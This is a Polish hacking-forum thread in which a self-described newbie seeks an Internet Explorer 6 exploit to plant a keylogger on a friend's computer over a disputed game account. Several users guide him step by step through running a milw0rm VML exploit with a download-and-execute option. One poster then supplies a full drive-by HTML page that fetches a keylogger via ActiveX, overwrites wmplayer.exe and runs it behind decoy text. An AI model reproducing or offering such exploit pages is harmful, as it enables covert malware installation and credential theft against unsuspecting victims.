exploit do ściągania trojana

[Zedd]

Witam.
Odrazu mowie ze nie znam sie jeszcze na zadnym jezyku programowania itp.

Przedstawie sprawe odrazu:
Kumpel zajumal mi konto w CS
Wiem ze on uzywa IE 6.0

Jest jakis exploit ktory dziala na IE 6.0?
Chodzi mi o to aby ten exploit po wejsciu na strone sciagnal mu keylogera.

Z gory dzieki

 

[sinis]

Pełno exploitów znajdziesz tutaj: www.milw0rm.com <- wybierz sobie coś

 

[Zedd]

ale tak jak mowilem za bardzo nei znam sie na programowaniu ;/
przegladalem sporo stron ale kurde nie wiem do czego sluza bo nie ma w nich linku do pliku zadnego ;(

 

[sinis]

Na stronce, którą Ci podałem możesz znaleść odpowiedni przez szukajkę, a kompilacja nie wymaga znajomości jakiegokolwiek języka programowania...

 

[Zedd]

no ta wpisuje Internet explorer i troche tego jest... tylko pytanie:
Ktory sciaga cos na kompa ofiary ? bo slyszalem ze sa rozne rodzaje exploitow

[ Dodano: 01-10-2007, 15:33 ]
oto kolejne pytanie ;p
mam exploit
ale nie wiem jak go uzyc ;F

http://www.milw0rm.com/exploits/3148

Wzialem go na notatnik, przerobilem
zmienilem na .html i wrzucilem na server
wchodze na strone i normalnei tylko zrodlo mi sie pokazalo ;/ (tak jak na linku)
co zrobic zeby zadzaialal ;/

 

[RobertG]

On jest napisany w Perlu, w środku masz instrukcję ;/ :

print "(c) pang0 // [url]www.tcbilisim.orgnbug[/url] found3d by LifeAsaGeeknMS07-004 VML integer overflow exploitnusage: perl $0 <shell> <opt>n",

"shell => -b bind(31337)n-d down.exec if selc. -d u must a down addr. n",

"exam: perl $0 -bnexam2: perl $0 -d http://blah.com/nc.exen" and exit if !$ARGV[0];

jakbyś to odpalił to zobaczysz:

C:Documents and SettingspokemonPulpit>perl d.pl

(c) pang0 // [url]www.tcbilisim.org[/url]

bug found3d by LifeAsaGeek

MS07-004 VML integer overflow exploit

usage: perl d.pl <shell> <opt>

shell => -b bind(31337)

-d down.exec if selc. -d u must a down addr.

exam: perl d.pl -b

exam2: perl d.pl -d [url]http://blah.com/nc.exe[/url]

Sciągnij ActivePerla jak używasz windowsa a jak masz jakiegoś linuxa to perl jest od razu (prawie zawsze) i uruchom go tak jak pisze.

 

[Zedd]

kurde nie kumam tego active perla. moze ktos wytlumaczyc jak to skompilowac w Active Perlu ? ;/ bo ja tam takiej opcji nie widze

 

[RobertG]

1.Sciągasz ActivePerla i instalujesz
2. Menu start -> uruchom ->cmd
3. Przechodzisz do miejsca, gdzie masz zapisanego tego exploita
4. wpisujesz:

perl [nazwa_skryptu] [opcje dla skryptu]

Jeżeli po instalacji będzie tak, że w cmd wpiszesz perl i wyskoczy napis, że nie wiadomo co to za komenda to perla nie ma dodanego do PATH. To jest w necie jak to zrobić to sie nie będę tu rozpisywał.

Skrypty w Perlu rzadko się kompiluje (ale racja, można). Najczęściej się je wykonuje, pisząc w lini poleceń:
perl nazwa_skryptu opcje_dla_skryptu

bo ja tam takiej opcji nie widze

Opcji "kompiluj i hakuj"? ;/ Poczytał byś trochę o Perlu to by wszytko było jasne:
http://en.wikipedia.org/wiki/Perl
http://faq.perl.org/
...a będe nieskromny i zapodam linka z moim tekstem

http://torus.uck.pk.edu.pl/~fg016/texty/Perl.html

 

[Zedd]

ok.
teraz tylko pytanie jeszcze jak w CMD napisze
perl bla.html <i co tu wpisac ?> czyli jakie jest polecenie kompilacji ?

A potem to juz wiem chyba domene zalozyc strone i wrzucic plik jako strone chyba tak.

 

[RobertG]

Ejj, skopiuj kod źródłowy expolita, wlep do czystego pliku tekstowego i zapisz np:
test.pl
Jak próbujesz po prostu zapisać plik: http://www.milw0rm.com/exploits/3148 a potem go wykonać to to jest strona HTML, ze swoimi tagami i Perl się na nich gubi.

To jak odpalić explita jest podane w kodzie, patrz mój pierwszy post w tym topicu, np:

perl d.pl -b

Wtedy wygeneruje się plik ze stroną html i ją chyba trzeba wrzucić na serwer (no i trojana czy co tam chcesz też)

A potem to juz wiem chyba domene zalozyc strone i wrzucic plik jako strone chyba tak.

Dla mnie opis działania tego exploita jest totalnie nie logiczny więc Ci nie pomogę..

//EDIT
Nie masz go skompilować tylko uruchomić interpreterem i Ci się strona wygeneruje odpowiednio spreparowana, wpisz:
perl nazwa_skryptu -b
I Ci się pojawi strona nowa i ja na serwer chyba masz wysłać. Stronę nie skrypt (tak myśle)
Kompiluje się perlcc, ale to działa pod linuxem.

interpretacja != kompilacja

 

[Zedd]

nie rozumiem ;/ myslalem ze ten exploit ma sciagnac keylogera albo cokolwiek na kompa ofiary. ale jak go nie rozumiesz to ja tym bardziej ;/ jesli tak to moglbys polecic jakiegos exploita dzialajacego tak, zeby sciagnal trojana na kompa ofiary (ofiara uzywa IE 6.0)??
Wiem , ze juz mi tyle pomogles ale naprawde jestem newbie a zalezy mi na moim koncie w CS ;/

EDIT//

interpretacja to odpalenie pliku bez tworzenia a kompilacja to stworzenie pliku o ile sie dobrze orientuje.
powiedziales ze dzialanie tego exploita jest dla ciebie nielogiczne czy cos takiego. wiec co ten exploit robi ? ps. ok zrobie tak jak mowiles

 

[RobertG]

Nie mogę polecić bo ja nie używam expolitów. Twój temat mnie zaciekawił bo kod w Perlu był i nie umiałeś uruchomić a ja lubię Perla. Sorry

interpretacja to odpalenie pliku bez tworzenia a kompilacja to stworzenie pliku o ile sie dobrze orientuje.[/b]

Tak

wiec co ten exploit robi ?[/b]

Tworzy plik html który chyba trzeba wysłać na serwer wraz z trojanem i dać ofierze linka do tej strony

Dobra, tyle ode mnie bo jeszcze zacznę głupoty mówić, niech się ktoś w temacie się odezwie =]

//EDIT
nie wiem, co jest źle.. Pokaż screena z widokiem na cmd

//EDIT2
spróbuj zapisać skrypt w jakimś innym miejscu, np na pulpicie i stamtąd odpalić..

 

[Zedd]

malo jest osob ktore pomagaja takim newbie jak ja... dzieki Ci wielkie
teraz chodze do szkoly sredniej na informatyke a programowanie dopiero w drugim roku ;/

btw. zrobilem tak jak mowiles: notatnik, kopiuj wklej skrypt i zapisalem go jako te.pl
odpalam cmd.
perl te.pl -b
i wyskakuje mi
Can't open perl script "te.pl"ermission denied
PS. skryptu nie zmienialem zeby nie bylo ze cos zmienilem i blad jakis
kurdeee ;/


EDIT//


[ Dodano: 03-10-2007, 04:22 ]
kur** cos ten cmd u mnie szaleje
Jak wpisze Windows to Odmowa dostepu. Nie moge nawet wejsc w d: bo jakis blad
wyskakuje ;<


EDIT!!
Jestes mistrzem ;p
Zrobil mi sie Plik Laz.html
I teraz pytanie jakie ma domyslne dzialanie ten exploit ? jak go wyproboje u siebie to czego doznam ? :>
I jak go zmienic tak, aby sciagal MOJEGO keylogera ? tylko pliki .exe podmienic ?

 

[hxv]

Musisz wrzucić plik exe na stronkę, i napisać w konsoli:

perl te.pl -d [url]http://serwer.pl/adres_do_pliku.exe[/url]

znów wygeneruję się plik Laz.html, wrzucasz go na serwer (nawet ten sam co keylogger), i dajesz ofierze link do pliku Laz.html.

 

[Zedd]

oczywiscie moge zmienic nazwe z laz.html na index.html nie ??

EDIT.
A tak btw. to mam zmieniac cos w exploicie ?? np. pliki .exe na adres pliku mojego .exe czy on sam sie zmieni jak wpisze wyzej wymieniona komende?

[ Dodano: 05-10-2007, 22:02 ]
ehhh tamten exploit nie dziala. znalazlem nowego lepszego.

http://milw0rm.com/exploits/4393

EDIT//
jestem juz bardzo zdesperowany... najwyzej dostane bana ;>

Czy moglby ktos dac exploitan a IE 6.0 (dzialajacego) z opisem gdzie co wpisac i jak skompilowac zeby na .html byl albo cos zeby na strone wrzucic ? (tzw. gotowiec.)

 

[akselekbezelek]

<HTML>
<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "ADRES KEYLOGGERA",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("Crogram FilesWindows Media Playerwmplayer.exe",2);
location.href = "mms://";

</textarea>
TUTAJ MOŻEMY COŚ DODAĆ [np. Server is extremely busy at this moment. Please wait when server generate mirror for you...]
<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/rn/);
for (i=0;i<lines.length;i++) {

line = lines;
line = line.replace(/^s+/,"");
line = line.replace(/s+$/,"");
line = line.replace(/'/g,"'");
line = line.replace(/[]/g,"");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line + 'rn';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:java script:eval('" + mycode + "')";
window.open(myURL,"_media");
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);

</script>
<script>function go(){ self.location.href='ADRES STRONY KTORA WYSWIETLI SIE PO ZALADOWANIU KEYLEGGERA [np. wlasnie ten mirror]'; }
setTimeout('go()',10000); </script>
</HTML>[/b]

orginalny link do tematu http://www.haker.com.pl/forum/viewtopic.php?t=20045

 

[b.]

Dziala tylko pod ie?

 

[akselekbezelek]

Originally posted by b.
Dziala tylko pod ie?

ie 6

 

[japcok]

ja mam pod IE 7 i starsze

 

[Zedd]

to sie moze podziel...